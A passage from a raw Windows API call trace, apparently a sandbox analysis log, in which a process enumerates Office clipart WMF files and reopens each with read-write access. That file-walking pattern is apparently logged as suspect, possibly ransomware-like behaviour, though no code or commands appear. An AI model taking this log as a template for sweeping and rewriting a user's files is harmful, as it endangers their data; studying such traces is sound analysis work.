Office\\root\\CLIPART\\PUB60COR\\BD19695_.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19695_.WMF", lpUsedDefaultChar=0x0) returned 69 [0102.297] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cce8 [0102.297] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.297] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.297] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0102.297] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0102.298] AreFileApisANSI () returned 1 [0102.298] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cce8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0102.298] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8a2d0 [0102.298] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cce8, cbMultiByte=-1, lpWideCharStr=0x8a2d0, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19695_.WMF") returned 69 [0102.298] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19695_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd19695_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0102.298] GetFileType (hFile=0x368) returned 0x1 [0102.298] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a2d0 | out: hHeap=0x20000) returned 1 [0102.298] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0102.298] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0102.298] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0102.299] CloseHandle (hObject=0x368) returned 1 [0102.299] AreFileApisANSI () returned 1 [0102.299] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cce8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0102.299] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8a660 [0102.299] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cce8, cbMultiByte=-1, lpWideCharStr=0x8a660, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19695_.WMF") returned 69 [0102.299] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19695_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd19695_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0102.299] GetFileType (hFile=0x368) returned 0x1 [0102.299] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a660 | out: hHeap=0x20000) returned 1 [0102.299] CloseHandle (hObject=0x368) returned 1 [0102.299] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0102.299] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0102.299] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0102.299] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0102.299] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0102.299] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0102.299] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0102.299] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0102.300] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0102.300] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dff8 [0102.300] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0102.300] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dff8 | out: hHeap=0x20000) returned 1 [0102.300] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0102.300] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0102.300] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0102.300] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0102.300] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0102.300] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0102.300] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0102.300] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0102.300] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0102.300] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0102.300] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0102.300] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0102.300] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0102.300] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0102.300] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0102.300] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0102.300] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0102.300] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0102.300] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0102.300] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0102.300] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0102.300] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0102.300] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0102.300] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0102.300] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0102.300] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0102.300] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0102.300] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0102.300] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0102.300] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0102.300] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0102.300] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0102.301] AreFileApisANSI () returned 1 [0102.301] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cce8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0102.301] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8a5c8 [0102.301] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cce8, cbMultiByte=-1, lpWideCharStr=0x8a5c8, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19695_.WMF") returned 69 [0102.301] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19695_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd19695_.wmf"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xccd61fa, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xccd61fa, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xccfc47e, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x32b6)) returned 1 [0102.301] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a5c8 | out: hHeap=0x20000) returned 1 [0102.301] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0102.301] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0102.308] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cce8 | out: hHeap=0x20000) returned 1 [0102.308] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.308] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.308] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xccd61fa, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xccd61fa, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xccfc47e, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x25ee, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="BD19827_.WMF", cAlternateFileName="")) returned 1 [0102.308] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0102.308] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0102.308] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0102.308] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0102.308] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0102.308] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0102.308] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0102.308] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0102.309] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfa0 [0102.309] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f90 [0102.309] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0102.309] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f90 | out: hHeap=0x20000) returned 1 [0102.309] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cee0 [0102.309] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34ed0 [0102.309] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0102.309] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34ed0 | out: hHeap=0x20000) returned 1 [0102.309] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0102.309] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75c60 [0102.309] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0102.309] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5f9a8 [0102.309] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75c60 | out: hHeap=0x20000) returned 1 [0102.309] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0102.309] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a498 [0102.309] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5f9a8 | out: hHeap=0x20000) returned 1 [0102.309] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.309] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.309] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.309] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.309] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a498 | out: hHeap=0x20000) returned 1 [0102.309] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0102.310] AreFileApisANSI () returned 1 [0102.310] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19827_.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19827_.WMF", lpUsedDefaultChar=0x0) returned 69 [0102.310] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d790 [0102.310] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.310] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.310] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0102.310] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0102.310] AreFileApisANSI () returned 1 [0102.310] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d790, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0102.310] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8a400 [0102.310] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d790, cbMultiByte=-1, lpWideCharStr=0x8a400, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19827_.WMF") returned 69 [0102.310] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19827_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd19827_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0102.310] GetFileType (hFile=0x368) returned 0x1 [0102.310] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a400 | out: hHeap=0x20000) returned 1 [0102.311] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0102.311] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0102.311] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0102.311] CloseHandle (hObject=0x368) returned 1 [0102.311] AreFileApisANSI () returned 1 [0102.312] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d790, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0102.312] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8aa88 [0102.312] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d790, cbMultiByte=-1, lpWideCharStr=0x8aa88, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19827_.WMF") returned 69 [0102.312] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19827_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd19827_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0102.312] GetFileType (hFile=0x368) returned 0x1 [0102.312] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8aa88 | out: hHeap=0x20000) returned 1 [0102.312] CloseHandle (hObject=0x368) returned 1 [0102.312] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0102.312] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0102.312] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0102.312] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0102.312] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0102.312] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0102.312] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0102.312] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0102.312] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0102.312] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0102.312] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e260 [0102.313] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0102.313] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0102.313] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0102.313] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0102.313] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e260 | out: hHeap=0x20000) returned 1 [0102.313] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0102.313] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0102.313] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0102.313] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0102.313] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0102.313] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0102.313] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0102.313] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0102.313] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0102.313] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0102.313] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0102.313] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0102.313] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0102.313] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0102.313] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0102.313] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0102.313] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0102.313] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0102.313] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0102.313] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0102.313] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0102.313] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0102.313] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0102.313] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0102.313] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0102.313] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0102.313] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0102.313] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0102.313] AreFileApisANSI () returned 1 [0102.313] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d790, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0102.314] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8af48 [0102.314] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d790, cbMultiByte=-1, lpWideCharStr=0x8af48, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19827_.WMF") returned 69 [0102.314] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19827_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd19827_.wmf"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xccd61fa, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xccd61fa, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xccfc47e, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x25ee)) returned 1 [0102.314] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8af48 | out: hHeap=0x20000) returned 1 [0102.314] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0102.314] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0102.314] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d790 | out: hHeap=0x20000) returned 1 [0102.314] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.314] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.314] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcd6eb88, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xcd6eb88, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xcd6eb88, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2244, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="BD19828_.WMF", cAlternateFileName="")) returned 1 [0102.314] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0102.314] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0102.314] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0102.314] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0102.314] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0102.314] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0102.314] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0102.314] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0102.314] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cef0 [0102.314] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34fd0 [0102.314] HeapFree (in: hHeap=0x20000, 